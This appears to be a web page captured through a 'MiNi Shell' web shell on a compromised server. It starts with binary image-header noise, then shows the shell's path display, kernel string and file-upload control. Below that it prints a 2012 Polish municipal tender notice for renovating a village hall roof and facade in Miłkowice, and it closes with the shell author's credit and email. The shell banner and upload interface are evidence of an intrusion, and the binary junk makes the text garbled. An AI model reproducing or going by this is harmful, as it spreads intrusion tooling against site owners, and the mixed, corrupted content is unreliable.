JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120726/271250-N-2012.html

<p class="kh_header"><b>Miłkowice: Przebudowa i ocieplenie dachu - etap I oraz termomodernizacja elewacji - etap II budynku świetlicy wiejskiej w Miłkowicach.</b><br>
<b>Numer ogłoszenia: 271250 - 2012; data zamieszczenia: 26.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miłkowice , ul. II Armii Wojska Polskiego 71, 59-222 Miłkowice, woj. dolnośląskie, tel. 076 8871212, faks 076 8871213.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa i ocieplenie dachu - etap I oraz termomodernizacja elewacji - etap II budynku świetlicy wiejskiej w Miłkowicach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przebudowa i ocieplenie dachu - etap I oraz termomodernizacja    elewacji - etap II budynku świetlicy wiejskiej w Miłkowicach.

 2. Przedmiot zamówienia obejmuje wykonanie prac budowlanych 	polegających na przebudowie dachu i termomodernizacji elewacji budynku świetlicy wiejskiej w Miłkowicach zlokalizowanej na działce nr 	348/2.
Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja 	projektowa oraz specyfikacja techniczna wykonania i odbioru robót oraz przedmiar robót.
 Przedmiar robót będący częścią dokumentacji projektowej pełni jedynie   	funkcję pomocniczą, dodatkową nie jest jedynym źródłem do określenia   ceny. 	Wykonawca zrealizuje również roboty zgodnie z zakresem rzeczowym ujętym w dokumentacji projektowej i specyfikacji technicznej wykonania i odbioru robót budowlanych oraz niniejszą SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.11.00-9, 71.30.00.00-1, 45.21.00.00-2, 45.31.10.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 2.500,00 	PLN w formie zgodniej z art. 45 ust. 6 ustawy Pzp.
2. W przypadku złożenia wadium w formie pieniężnej, wadium należy wnieść przelewem na konto w Banku Spółdzielczym Wschowa o/Miłkowice  94866900010320592920000003
Wadium winno być na koncie Zamawiającego nie później niż przed upływem terminu składania ofert. 
Dowód potwierdzenia złożenia wadium należy załączyć do oferty.
4. W przypadku złożenia wadium w formie gwarancji, poręczeń, oryginał 	dokumentu należy złożyć nie później niż przed upływem terminu składania ofert w kasie Gminnego Ośrodka Kultury i Sportu. Kopię dokumentu, należy dołączyć do oferty, za wyjątkiem pkt 5. 
5. Jeśli Wykonawca prześle ofertę pocztą winien kopię dowodu wniesienia 	wadium załączyć do oferty, natomiast oryginał umieścić w oznaczonej 	kopercie oryginał dowodu wniesienia wadium. 
6. Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po 	wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem 	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza,  z zastrzeżeniem pkt. 9.
7. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza,Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie 	zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
8.Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy,który wycofał ofertę przed upływem terminu składania ofert.
9.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w 	odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy PZP, 	nie 	złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1,  lub 	pełnomocnictw, chyba że udowodni, iż wynika to z przyczyn nieleżących po jego stronie.
10.Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, 	któremu zwrócono wadium zgodnie z punktem 6, jeżeli w wyniku rozstrzygnięcia 	odwołania jego oferta została wybrana jako najkorzystniejsza. 
Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
11. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z 	odsetkami 	wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszonym o koszty prowadzenia rachunku oraz prowizji 	bankowej za przelew pieniędzy na rachunek Wykonawcy.
12. Wadium wraz z odsetkami wniesione w pieniądzu przez Wykonawcę, 	którego oferta została uznana za najkorzystniejszą, na wniosek tego 	Wykonawcy, zaliczane jest przez Zamawiającego na poczet 	zabezpieczenia należytego wykonania umowy.
13. 	Wykonawca, którego oferta została wybrana, traci wadium wraz z 	odsetkami na rzecz Zamawiającego w przypadku, gdy:
a)odmówił podpisania umowy na warunkach określonych w ofercie,
b)nie wniósł wymaganego zabezpieczenia należytego wykonania umowy (jeżeli dotyczy),
c)zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku  
Za spełnienie warunku posiadania niezbędnego doświadczenia Zamawiający uzna wykonanie w okresie ostatnich 5 lat (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) przed upływem terminu składania ofert min. 1 zadania w zakresie budowy i/lub przebudowy i lub remontu dachu obiektu kubaturowego i elewacji, o wartości min. 80.000 PLN (brutto), z podaniem rodzaju, wartości, daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że te roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Sprawdzenie wyżej wymienionego warunku udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń   wg zasady spełnia  nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku  
Za spełnienie warunku dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający uzna dysponowanie min. 1 osobą na stanowisku Kierownika Budowy, posiadającą uprawnienia budowlane w specjalności ogólnobudowlanej lub odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów. 
4.2) Wykonawca winien potwierdzić, że wykazane osoby posiadają wymagane 	przez Zamawiającego uprawnienia.
Sprawdzenie wyżej wymienionego warunku udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń wg zasady spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony i podpisany formularz oferty - wg załącznika nr 1 do SIWZ.
2.Wypełniony i podpisany Kosztorys Ofertowy - wg załącznika nr 2 do SIWZ. 
3.Zaakceptowany projekt umowy - wg załącznika nr 8 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.Dopuszcza się możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w 	przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, w zakresie:
2.1.	Zmiany terminu realizacji zadania: 
a)zmiany przepisów powodujących konieczność innych rozwiązań niż zakładano w opisie przedmiotu zamówienia;
b)zmiany przepisów powodujących konieczność uzyskania dokumentów, które te 	przepisy narzucają;
c)gdy organy i instytucje uzgadniające nie wydały uzgodnień w ustawowym terminie, a   w przypadku zarządzających mediami w terminie 2 miesięcy; 
e)warunki atmosferyczne uniemożliwiające prowadzenie robót budowlanych, 	przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów, w szczególności: 	niedopuszczalne temperatury powietrza, wiatr uniemożliwiający pracę maszyn 	budowlanych, gwałtowne opady deszczu (oberwanie chmury), gradobicie, burze z 	wyładowaniami atmosferycznymi, obfite opady śniegu, zalegający śnieg itd.;
f)w przypadku natrafienia przez Wykonawcę na urządzenia podziemne uprzednio 	niezinwentaryzowane uniemożliwiające planowe wykonanie robót;
g) inne przyczyny zewnętrzne niezależne od Zamawiającego i Wykonawcy skutkujące 	niemożliwością prowadzenia prac, a w szczególności brak możliwości dojazdu oraz transportu materiałów na teren robót spowodowany awariami, remontami, 	przebudową dróg dojazdowych oraz protestami mieszkańców z blokadą dróg.
2.2.	Zmian osobowych:
a)zmiany osób realizujących zamówienie  pod warunkiem, że osoby te będą spełniały wymagania określone w SIWZ;
b)	zmiany osób reprezentujących w przypadku zmian organizacyjnych;
c)zmiana podwykonawcy, przy pomocy którego Wykonawca wykonuje przedmiot 	umowy; zmiana jest możliwa tylko w przypadku, gdy nowy podwykonawca posiada 	tożsamą wiedzę i doświadczenie zawodowe, potencjał techniczny oraz osoby zdolne do wykonania zamówienia a także jest w sytuacji ekonomiczniej i finansowej, 
jak dotychczasowy podwykonawca,
d)rozszerzenie zakresu podwykonawstwa w porównaniu do wskazanego w ofercie 	Wykonawcy, o ile posłużenie się podwykonawcą doprowadzi do skrócenia terminu 	wykonania przedmiotu umowy, zmniejszenia należnego Wykonawcy 	wynagrodzenia lub zastosowania przy wykonaniu przedmiotu umowy bardziej 	zaawansowanych rozwiązań technologicznych w porównaniu do wskazanych w 	SIWZ. Zmiana ta nie może dotyczyć czynności, które zgodnie z SIWZ muszą być 	wykonane przez Wykonawcę 	osobiście.
2.3.	Pozostałych zmian: 
a)w każdym przypadku, gdy zmiana jest korzystna dla Zamawiającego (np.: 	powoduje skrócenie terminu realizacji umowy, zmniejszenie wartości zamówienia);
b)W przypadku urzędowej zmiany wysokości podatku VAT, dopuszcza się  	możliwość sporządzenia  aneksu  do  umowy  uwzględniającego zmianę wartości umowy z tego tytułu;
c)zmiany procentowej wysokości płatności faktury częściowej w przypadku 	przedłużenia terminu realizacji zamówienia nie wynikającej z przyczyn leżących po 	stronie Wykonawcy;
d)zmiany wysokości środków finansowych przeznaczonych na realizację umowy w kolejnych latach budżetowych;
e)przypadki losowe (np. kataklizmy, awarie urządzeń wywołane przez wyładowania 	atmosferyczne lub inne czynniki zewnętrzne, zgony i niemożliwe do przewidzenia 	wydarzenia), które będą miały wpływ na treść zawartej umowy i termin realizacji;
f)obniżenie wynagrodzenia Wykonawcy;
g)rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim 	przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, przy 	czym 	Zamawiający zapłaci za wszystkie spełnione świadczenia i 	udokumentowane koszty, które Wykonawca poniósł w związku z wynikającymi z umowy planowanymi 	świadczeniami. 
i) zmiana nazwy zadania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.ug-milkowice.dolnyslask.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzad Gminy Miłkowice
59-222 Miłkowice
pok. 23a
ul. II Armii Wojska Polskiego 71.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.08.2012 godzina 10:00, miejsce: Urzad Gminy Miłkowice
59-222 Miłkowice
pok. sekretariat
ul. II Armii Wojska Polskiego 71.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Na przedmiotowe zadanie złożony został wniosek w ramach działania 413 Wdrażanie lokalnych Strategii Rozwoju w zakresie operacji odpowiadających warunkom przyznania pomocy w ramach działania Odnowa i rozwój wsi objętego PROW na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com